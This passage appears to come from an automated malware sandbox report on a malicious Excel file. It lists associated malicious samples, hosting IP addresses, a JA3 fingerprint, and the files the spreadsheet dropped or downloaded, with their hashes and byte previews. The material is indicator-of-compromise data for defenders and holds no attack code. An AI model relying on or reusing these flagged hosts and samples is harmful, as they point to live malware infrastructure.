                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                    • 192.185.5.2

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    UNIFIEDLAYER-AS-1USstatistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                    • 162.241.169.22
                                                                                    ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                    • 192.254.185.244
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    presentation.jarGet hashmaliciousBrowse
                                                                                    • 50.87.249.219
                                                                                    presentation.jarGet hashmaliciousBrowse
                                                                                    • 50.87.249.219
                                                                                    GK58.vbsGet hashmaliciousBrowse
                                                                                    • 192.185.21.136
                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.20.98
                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.20.98
                                                                                    4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                    • 50.87.166.59
                                                                                    c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                    • 108.179.242.122
                                                                                    c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                    • 108.179.242.122
                                                                                    6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                    • 162.241.24.47
                                                                                    DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                    • 162.241.169.22
                                                                                    generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.177.61
                                                                                    UNIFIEDLAYER-AS-1USstatistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                    • 162.241.169.22
                                                                                    ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                    • 192.254.185.244
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.254.233.89
                                                                                    presentation.jarGet hashmaliciousBrowse
                                                                                    • 50.87.249.219
                                                                                    presentation.jarGet hashmaliciousBrowse
                                                                                    • 50.87.249.219
                                                                                    GK58.vbsGet hashmaliciousBrowse
                                                                                    • 192.185.21.136
                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.20.98
                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.20.98
                                                                                    4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                    • 50.87.166.59
                                                                                    c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                    • 108.179.242.122
                                                                                    c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                    • 108.179.242.122
                                                                                    6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                    • 162.241.24.47
                                                                                    DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                    • 162.241.169.22
                                                                                    generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.177.61

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    7dcce5b76c8b17472d024758970a406bstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    MV RED SEA.docxGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    SecuriteInfo.com.Heur.31681.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    presupuesto.xlsxGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    ORDER INQUIRY.docGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    diagram-586750002.xlsmGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89
                                                                                    94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                    • 192.185.5.2
                                                                                    • 192.254.233.89

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):893
                                                                                    Entropy (8bit):7.366016576663508
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):326
                                                                                    Entropy (8bit):3.108530598490857
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKHkcwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:/HwTJrkPlE99SNxAhUe0ht
                                                                                    MD5:A9AEF2A691D32823CA004DB5A4E6D1B1
                                                                                    SHA1:048220F150A19CEE835E02C9B102E2549EC7C51A
                                                                                    SHA-256:123D61E0B4248FB8474DDCAAF38792BD5D65A7BDA2E9876AC644DA04A86EED21
                                                                                    SHA-512:0468356E69ABFE5F0A5D3283BB8D6D326E06B36F917A0A9047CF4B39547776C9A16A2CDC3DFAA25997918351A667E270701B7D010ED3DC539076CD20131ADBB8
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: p...... ............'A..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):252
                                                                                    Entropy (8bit):2.972520505905614
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:kkFklQCI/XfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kK/90QE1liBAIdQZV7ulPPN
                                                                                    MD5:E7F506FD38BF085AA67201A4C34F1452
                                                                                    SHA1:E0344908024E332071F87134967530F4E3FF3C79
                                                                                    SHA-256:C2D2DD211EF139C412AEEB2FD777BDD0339638ACAA80ACEF25F686CBDF59E1C1
                                                                                    SHA-512:6E8D80AEC5925E23745D98EA79EF1F10A010ADA89F76462EFDDFDF7865A3105C4C5C8864516A1AAADEDCC219CA068360A879BDE82F118A31C6C2F7CB5BD04AD9
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: p...... ....`...7.i.'A..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\suspendedpage[1].htm
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:downloaded
                                                                                    Size (bytes):494
                                                                                    Entropy (8bit):4.962239405540505
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                    MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                    SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                    SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                    SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                                    Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48501294.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):8301
                                                                                    Entropy (8bit):7.970711494690041
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63EBE985.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):34787
                                                                                    Entropy (8bit):7.9883689087667955
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                    MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                    SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                    SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                    SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6DA5ADB.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):848
                                                                                    Entropy (8bit):7.595467031611744
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E002D9C2.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):557
                                                                                    Entropy (8bit):7.343009301479381
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                    C:\Users\user\AppData\Local\Temp\CFDE0000
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):109077
                                                                                    Entropy (8bit):7.916954833344646
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfZD:oeuocrZD2MopH8x+FHdoLqp6vif+zbl
                                                                                    MD5:520DFA3FCAA0EB5150D431FD0A7BD0C9
                                                                                    SHA1:D74FBF464CBA7779A4289F6E0BC4717BEE201189
                                                                                    SHA-256:7A25221090E8C732FFF6D20897E838B0F11160DD223C8B7CD8B0DBC80AD25054
                                                                                    SHA-512:A92F840135F9AA8218E502E9ED48B8A18706AF0DCCA0AA52F23DE374AC69533D4BF474F67423B9E61049420B320DCE8763AE2E5C98F8DC96D270CF6BE347724A
                                                                                    Malicious:false
                                                                                    Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\CabEA41.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\Local\Temp\TarEA42.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):152788
                                                                                    Entropy (8bit):6.309740459389463
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                    Malicious:false
